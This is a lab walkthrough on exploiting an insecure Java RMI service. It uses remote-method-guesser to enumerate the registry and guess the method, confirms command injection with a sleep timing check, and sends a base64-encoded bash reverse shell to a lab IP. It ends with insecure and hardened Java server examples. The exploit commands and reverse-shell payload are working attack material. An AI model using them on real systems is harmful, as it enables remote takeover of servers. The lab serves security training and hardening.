Insecure RMI
In this lab, you will learn to query the RMI registry for the RMI server's bound names, brute-force the name of a potentially vulnerable remote method, and invoke that method to run arbitrary commands on the RMI server.
Scanning the host with Nmap.

Using remote-method-guesser (rmg) to enumerate the registry reveals a custom bound name.

The tool can also be used to guess the signature of the remote method exposed by that bound name.

Notice that calling remote methods does not create any output by default. To process outputs generated by the call action, you need to use remote-method-guesser's plugin system and register a ResponseHandler. The plugin folder of the remote-method-guesser repository contains a GenericPrint plugin that is suitable for most situations.
# Use a time-based payload to check for the command injection: a sleep of 5 seconds should delay the call by about as much
time java -jar target/rmg-4.2.2-jar-with-dependencies.jar call demo.ine.local 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)'

# Generate reverse shell
echo '/bin/bash -c "bash -i >& /dev/tcp/192.231.23.2/54321 0>&1"' | base64 -w0;echo
# Send the reverse shell
java -jar target/rmg-4.2.2-jar-with-dependencies.jar call demo.ine.local 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4yMzEuMjMuMi81NDMyMSAwPiYxIgo= | base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar
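The server-side pattern this lab exploits, beside a hardened form, as an added Java example; it is not part of the lab or of remote-method-guesser. Only the method signature String runCommand(String[] args) and the bound name CustomRMIServer come from the lab; the interface name CommandService, the allow-listed operation names, and the serialization filter pattern are assumptions chosen for the example. The insecure class is shown only to make the defect concrete and is never bound.

```java
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;
import java.util.Map;

public class RmiCommandServiceDemo {

    // Remote interface with the signature the lab calls. The interface name is an
    // assumption; only "String runCommand(String[] args)" is taken from the lab.
    public interface CommandService extends Remote {
        String runCommand(String[] args) throws RemoteException;
    }

    // INSECURE: the client supplies both the program and its arguments, so anyone who
    // can reach the registry runs arbitrary programs as the server's user. This is the
    // defect the lab's "call" action exploits. Shown for contrast only.
    static final class InsecureCommandService implements CommandService {
        @Override
        public String runCommand(String[] args) throws RemoteException {
            try {
                Process p = new ProcessBuilder(args).redirectErrorStream(true).start();
                return new String(p.getInputStream().readAllBytes());
            } catch (IOException e) {
                throw new RemoteException("exec failed", e);
            }
        }
    }

    // HARDENED: the client picks a named operation; the program and its arguments are
    // fixed server-side. The operation names are constructed for this example. The
    // stronger fix is to remove command execution from the remote interface entirely.
    static final class AllowListedCommandService implements CommandService {
        private static final Map<String, String[]> OPERATIONS = Map.of(
            "uptime", new String[] {"uptime"},
            "disk",   new String[] {"df", "-h", "/"});

        @Override
        public String runCommand(String[] args) throws RemoteException {
            if (args == null || args.length != 1 || !OPERATIONS.containsKey(args[0])) {
                // Reject without echoing the input: the message is returned to the caller.
                throw new RemoteException("unknown operation");
            }
            try {
                Process p = new ProcessBuilder(OPERATIONS.get(args[0]))
                        .redirectErrorStream(true).start();
                return new String(p.getInputStream().readAllBytes());
            } catch (IOException e) {
                throw new RemoteException("operation failed", e);
            }
        }
    }

    public static void main(String[] argv) throws Exception {
        // Process-wide deserialization filter (Java 9+) applied to the streams RMI uses
        // to read call arguments: allow JDK classes from java.base and java.rmi, reject
        // everything else. Same effect as -Djdk.serialFilter="java.base/*;java.rmi/*;!*".
        // The pattern is this example's choice; widen it only for argument types you own.
        ObjectInputFilter.Config.setSerialFilter(
                ObjectInputFilter.Config.createFilter("java.base/*;java.rmi/*;!*"));

        // Export the hardened service and bind it under the lab's bound name. The
        // registry still listens on every interface; restrict reachability of TCP/1099
        // at the network layer as well.
        CommandService svc = new AllowListedCommandService();
        CommandService stub = (CommandService) UnicastRemoteObject.exportObject(svc, 0);
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.rebind("CustomRMIServer", stub);
        System.out.println("CustomRMIServer bound; accepted operations: "
                + AllowListedCommandService.OPERATIONS.keySet());
    }
}
```

Against the hardened service, the lab's first call (new String[] {"sleep", "5"}) is rejected with "unknown operation" and returns immediately, so the timing check in the lab no longer shows a delay; the method name can still be guessed, which is why the allow-list, not obscurity of the signature, is what removes the risk.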